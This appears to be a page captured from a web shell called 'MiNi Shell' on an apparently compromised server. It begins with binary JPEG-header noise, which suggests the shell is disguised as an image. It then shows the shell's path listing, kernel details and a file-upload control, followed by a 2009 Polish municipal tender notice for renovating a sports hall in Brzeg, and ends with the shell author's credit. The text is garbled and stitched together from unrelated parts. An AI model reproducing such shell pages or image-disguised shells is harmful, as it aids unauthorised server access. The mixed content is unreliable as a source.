JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090713/110341-N-2009.html

<p class="kh_header"><b>Brzeg: Przebudowa hali sportowej przy ul. Oławskiej 2 w Brzegu wraz z remontem obszaru widowni - etap I</b><br>
<b>Numer ogłoszenia: 110341 - 2009; data zamieszczenia: 13.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Brzeg - Burmistrz Miasta Brzegu , ul. Robotnicza 12, 49-300 Brzeg, woj. opolskie, tel. 0077 4169950, faks 077 4169952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.brzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa hali sportowej przy ul. Oławskiej 2 w Brzegu wraz z remontem obszaru widowni - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający powierza, a Wykonawca zobowiązuje się do wykonania robót budowlano-remontowych w ramach zadania inwestycyjnego pn.: Przebudowa hali sportowej przy ul. Oławskiej 2 w Brzegu wraz z remontem obszaru widowni - etap I. Zakres zadania  obejmuje:
a)	wykonanie szybu windowego wraz z przekuciem przez istniejącą konstrukcje widowni (wraz zabezpieczeniem wykonanego szybu w związku z nieinstalowaniem na bieżącym etapie podnośnika dla osób niepełnosprawnych).
b) remont obszaru widowni wraz z wymianą siedzisk na widowni.
c) remont schodów wraz z stworzeniem nowych dla dostosowania obszaru widowni do wymagań p.poż.
d) wymiana barierek na całym obszarze widowni.
e) stworzenie platform dla osób niepełnosprawnych na najwyższym poziomie widowni.
f) wykonanie posadzek na schodach 
g) wykonanie na obszarze widowni posadzki,
zgodnie z załączonym przedmiarem robót, który stanowi integralną część niniejszej umowy.
 Przedmiot zamówienia Wykonawca zobowiązuje się wykonać na warunkach określonych w postanowieniach niniejszej umowy oraz w:
a) decyzji nr    z dnia         roku pozwolenia na budowę,
b) zatwierdzonej dokumentacji technicznej,
c) specyfikacjach technicznych wykonania i odbioru robót budowlanych,
d) złożonej ofercie,
które stanowią integralne części niniejszej umowy. 
Wykonawca wykona roboty objęte zadaniem,  przy użyciu materiałów zakupionych przez Wykonawcę oraz przy użyciu narzędzi i sprzętu pozostających w dyspozycji Wykonawcy. Wykonawca zapewni nadzór na budowie, poprzez ustanowienie kierownika budowy, posiadającego uprawnienia budowlane  do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności  konstrukcyjno-budowlanej konieczne do wykonania przedmiotu zamówienia oraz zapewni właściwe przestrzeganie przepisów bhp i p.poż. na remontowanym obiekcie i ponosi odpowiedzialność za wszelkie szkody wynikłe z nieprzestrzegania przez Wykonawcę tych przepisów. Roboty, stanowiące przedmiot niniejszej umowy Wykonawca zobowiązuje się wykonać z należytą starannością zgodnie z niniejszą umową, przedmiarami robót i specyfikacją techniczną wykonania i odbioru robót, sztuką budowlaną, obowiązującymi przepisami prawa, obowiązującymi Polskimi Normami oraz zasadami współczesnej wiedzy technicznej, w sposób zapewniający bezpieczne i higieniczne warunki pracy. Odpowiedzialność Wykonawcy z tytułu gwarancji wynosi 36 miesięcy na roboty budowlane i materiały użyte do ich wykonania, liczonej od dnia końcowego odbioru robót, tj. od dnia następnego po podpisaniu przez strony protokołu odbioru robót. W dniu podpisania protokółu odbioru robót Wykonawca zobowiązuje się przekazać Zamawiającemu stosowny dokument gwarancyjny.

W przypadku, o którym mowa w § 7 ust. 2 wzoru umowy, zawarcie umowy przez Wykonawcę z Podwykonawcą wymaga zgody Zamawiającego.
Wykonawca zobowiązany jest przedstawić Zamawiającemu projekt umowy z Podwykonawcą wraz z częścią dokumentacji dotyczącej wykonania robót określonych w projekcie umowy z Podwykonawcą.
Zamawiający ma prawo zgłoszenia sprzeciwu co do osoby Podwykonawcy oraz zastrzeżeń dotyczących postanowień zawartych w projekcie umowy z Podwykonawcą.
Nie zgłoszenie przez Zamawiającego sprzeciwu lub zastrzeżeń w terminie 14 dni od przedstawienia Zamawiającemu dokumentów, o których mowa w ust. 4 uznaje się za wyrażenie zgody na zawarcie umowy z Podwykonawcą.
W przypadku zawarcia umowy przez Podwykonawcę z dalszym Podwykonawcą, odpowiednie zastosowanie znajdują postanowienia w § 7 ust.  4, 5 i 6 wzoru umowy.
Za działania i zaniechania Podwykonawców Wykonawca ponosi wobec Zamawiającego odpowiedzialność jak za działania i zaniechania własne.
W przypadku powierzenia przez Wykonawcę części robót Podwykonawcy, Wykonawca zobowiązuje się do:
a)	informowania na piśmie Zamawiającego o każdej fakturze wystawionej przez Podwykonawcę oraz terminie jej płatności, a także o dokonanej zapłacie wynagrodzenia Podwykonawcy w terminie 7 dni od dnia otrzymania tej faktury lub zapłaty wynagrodzenia Wykonawcy,
b)	udostępnienia na każde żądanie Zamawiającego dokumentacji dotyczącej rozliczeń z Podwykonawcą,
c)	informowania Zamawiającego na piśmie z 7 dniowym wyprzedzeniem o terminie odbioru robót Podwykonawcy oraz zapewnienia Zamawiającemu możliwości uczestniczenia w odbiorze tych robót .
2.	W przypadku gdy Wykonawca nie dokonał zapłaty wynagrodzenia Podwykonawcy za wykonane przez niego roboty, Zamawiający ma prawo:
a)	wstrzymać wypłatę wynagrodzenia Wykonawcy do czasu zapłaty przez Wykonawcę wynagrodzenia Podwykonawcy, lub 
b)	do potrącenia z wynagrodzenia Wykonawcy należności Podwykonawcy, w przypadku zapłaty wynagrodzenia Podwykonawcy przez Zamawiającego.

Odbiór całości robót, określonych  umową nastąpi na podstawie sporządzonego na piśmie protokółu odbioru robót, potwierdzonego przez inspektora nadzoru i podpisanego przez Strony lub osoby przez nie upoważnione. Nie dopuszcza się częściowego obioru robót. W przypadku wystąpienia robót podlegających zakryciu oraz zanikowych Wykonawca ma obowiązek zgłoszenia na piśmie Zamawiającemu z wyprzedzeniem 2 dni roboczych o terminie zakrycia. Odbiór tych prac nastąpi na podstawie protokółu odbioru robót podlegających zakryciu i zanikowych zawierającego wykaz wykonanych robót, podpisanego przez Strony lub osoby przez nie upoważnione. Jeżeli Wykonawca nie poinformował w powyższy sposób o tych faktach Zamawiającego, zobowiązany jest na własny koszt odkryć te roboty lub wykonać otwory niezbędne do zbadania tych robót, a następnie przywrócić roboty do stanu poprzedniego.  Po zakończeniu całości robót objętych  umową Wykonawca zobowiązany jest uporządkować na własny koszt teren robót i przekazać go Zamawiającemu po odbiorze robót. W przypadku, gdy roboty, o których mowa w § 1 wzoru umowy wykonane zostaną wadliwie, Zmawiający ma prawo odmówić odbioru robót do czasu usunięcia wad w termie wyznaczonym przez Zamawiającego.
6. Wszelkie wady powstałe w okresie rękojmi lub gwarancji Wykonawca zobowiązuje się usuwać w terminie wyznaczonym przez Zamawiającego, uwzględniającym czas na usunięcie wad. Nie usunięcie wad przez Wykonawcę w powyższym terminie uprawnia Zamawiającego, oprócz naliczenia kar umownych, o których mowa w § 12 ust. 1 lit. c) wzoru umowy, do powierzenia usunięcia tych wad podmiotowi trzeciemu na koszt i ryzyko Wykonawcy, na co niniejszym wykonawca wyraża zgodę. Skorzystanie przez Zamawiającego z powyższych uprawnień pozostaje bez wpływu na zakres i uprawnienia Zamawiającego wynikające z udzielonej gwarancji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.21.20.00-6, 45.45.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	Warunki udziału w postępowaniu:
W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b)	posiadają niezbędną wiedzę i doświadczenie tj. Zamawiający przyjmuje, że będzie to wykonanie min 1 zadania obejmującego roboty konstrukcyjno-budowlane o wartości min. 300.000,00 zł brutto w okresie ostatnich 5 lat oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj. min. 1 osobą posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno-budowlanej lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
c)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
2)	Opis oceny spełnienia warunków: Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 specyfikacji istotnych warunków zamówienia oświadczeń lub dokumentów, wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Wraz z ofertą wypełnioną na Formularzu oferty należy załączyć: 
a)	oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych - na zał. nr 1 do oferty, 
b)	oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 pkt. 1- 3 ustawy Prawo zamówień publicznych - na zał. nr 2 do oferty, 
c)	wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - Zamawiający przyjmuje, że będzie to wykonani min 1 zadania obejmującego roboty konstrukcyjno-budowlane o wartości min. 300.000,00 zł brutto- na zał. nr 3 do oferty, oraz załączenia dokumentów potwierdzających, że roboty  te zostały wykonane należycie,
d)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Zamawiający dopuszcza możliwość złożenia czytelnej kserokopii wpisu do ewidencji działalności gospodarczej wystawionej w okresie wcześniejszym, ale potwierdzonej za zgodność z oryginałem PRZEZ ORGAN WYDAJĄCY WW.DOKUMENT W WYMAGANYM TERMINIE pod kątem aktualności stanu faktycznego z zapisami w ww. dokumencie.  
e)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,  
f)	aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
g)	polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, ważny na dzień otwarcia ofert,  
h)	pełnomocnictwo do reprezentowania, o ile ofertę składa pełnomocnik.
i)	kosztorysy ofertowe przygotowane na podstawie przedmiarów robót.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.brzeg.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOSiR  ul. Korfantego 34, 49-300 Brzeg.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2009 godzina 09:30, miejsce: Urząd Miasta w Brzegu ul. Robotnicza 12, 49-300 Brzeg, biuro podawcze parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com